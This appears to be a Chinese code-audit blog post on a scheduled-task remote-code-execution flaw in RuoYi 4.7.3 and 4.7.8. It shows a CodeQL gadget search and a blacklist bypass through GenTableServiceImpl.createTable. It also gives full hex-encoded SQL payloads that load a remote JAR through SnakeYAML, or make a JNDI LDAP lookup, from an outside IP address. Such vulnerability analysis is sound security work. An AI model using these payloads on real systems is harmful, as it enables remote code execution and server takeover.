【代码审计】RuoYi-4.7.3&4.7.8 定时任务RCE 漏洞分析

Z3r4y2025-11-14 1:02

目录

4.7.3

4.7.8

4.7.3

关注/monitor/job/add

做了黑名单和白名单

看一下定时任务是怎么执行的

在getDeclaredMethod获取方法后,并没有执行setAccessible(true),所以只能拿public方法

再看下isValidClassName的实现

其实就是,若非全限定类名,则从spring容器中取出对象;若是全限定类名,则利用反射调用无参构造函数方法创建对象

此逻辑在白名单处也有,代码仅仅对全限定类名(class)进行了检测,但没有对spring容器中的对象进行白名单检测。

则思路为,在spring容器中找到一个不在黑名单中的Bean

或者在白名单内找一个不在黑名单且符合要求的类

交给codeql跑一下

复制代码 
codeql database create ruoyi-database --language=java --command='mvn clean package -f "pom.xml"'

import java

from Method m

where
    m.getDeclaringType().getAConstructor().hasNoParameters() 
    m.isPublic()
    and m.getAParamType() instanceof TypeString
    and m.getDeclaringType().getPackage().getName().matches("com.ruoyi%")
    and not m.isAbstract()
    and not m.getDeclaringType().getPackage().getName().matches("com.ruoyi.common.utils.file%")
    and not m.getName().matches("get%")
    and not m.getName().matches("is%")
    and not m.getName().matches("has%")

select m.getDeclaringType().getPackage().getName(),m.getDeclaringType(),m

关注到com.ruoyi.generator.service.impl.GenTableServiceImpl#createTable

搜一下xml

可任意sql语句执行

复制代码 
genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 0x6a61... WHERE job_id = 1;')

这样就绕过了新建任务的Waf限制,可通过直接修改数据库来修改计划任务的内容

复制代码 
genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 0x6f72672e79616d6c2e736e616b6579616d6c2e59616d6c2e6c6f6164282721216a617661782e7363726970742e536372697074456e67696e654d616e61676572205b21216a6176612e6e65742e55524c436c6173734c6f61646572205b5b21216a6176612e6e65742e55524c205b22687474703a2f2f382e3133382e33382e38313a313333382f79616d6c2d7061796c6f61642e6a6172225d5d5d5d2729 WHERE job_id = 1;')

成功修改

弹出计算器

4.7.8

和4.7.3最大的区别在于白名单的处理逻辑

当调用Spring Bean的时候也要走一下白名单和黑名单

com.ruoyi.generator.service.impl.GenTableServiceImpl依然能过该版本的黑白名单

但在4.7.9版本被修了(

接着打就行,但换种打法

javax.naming.InitialContext#lookup

复制代码 
genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 0x6a617661782e6e616d696e672e496e697469616c436f6e746578742e6c6f6f6b757028276c6461703a2f2f382e3133382e33382e38313a313333382f237375696269616e2729 WHERE job_id = 1;')

成功修改

其他也都可以,不一一赘述了

javax.naming.InitialContext#lookup

org.yaml.snakeyaml.Yaml#load

org.springframework.jndi.JndiLocatorDelegate#lookup

org.springframework.jdbc.datasource.lookup.JndiDataSourceLookup#getDataSource

org.apache.velocity.runtime.RuntimeInstance#init

相关推荐
极客先躯31 分钟前
高级java每日一道面试题-2025年11月24日-容器与虚拟化题[Dockerj]-runc 的作用是什么?
java·oci 的命令行工具·最小可用·无守护进程·完全标准·创建容器的核心流程·runc 核心职责思维导图
用户606487671889636 分钟前
AI 抢不走的技能:用 Claude API 构建自动化工作流实战
java
我命由我123451 小时前
Kotlin 开发 - lateinit 关键字
android·java·开发语言·kotlin·android studio·android-studio·android runtime
aXin_ya1 小时前
微服务第八天 Sentinel 四种分布式事务模式
java·数据库·微服务
Halo_tjn1 小时前
Java Set集合相关知识点
java·开发语言·算法
Linsk1 小时前
Java和JavaScript的关系真是雷峰和雷峰塔的关系吗?
java·javascript·oracle
许彰午1 小时前
我手写了一个 Java 内存数据库(二):B+ 树的插入与分裂
java·开发语言·面试
zhouwy1131 小时前
Java 快速入门笔记:从基础语法到 Spring Boot 实战
java
极创信息2 小时前
信创产品认证怎么做?信创产品测试认证的主要流程
java·大数据·数据库·金融·软件工程
SamDeepThinking2 小时前
并发量就算只有2,该上锁还得上呀
java·后端·架构
热门推荐
01要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法02GitHub 镜像站点03Codex 接入 DeepSeek API 完整配置文档04【AI】2026 年具身智能模型和世界模型总结05裂开!ChatGPT 居然开始要手机号验证,附详细解决方法06零基础教你claude code 接入 deepseek V4072026年AI前瞻:量子AI、具身智能与科学发现的新纪元08实测可用|小米 MiMo 百万亿 Token 免费领,开发者速冲09在Windows 11上安装Docker的踩坑记录10CC-Switch & Claude 基于 Linux 服务器安装使用指南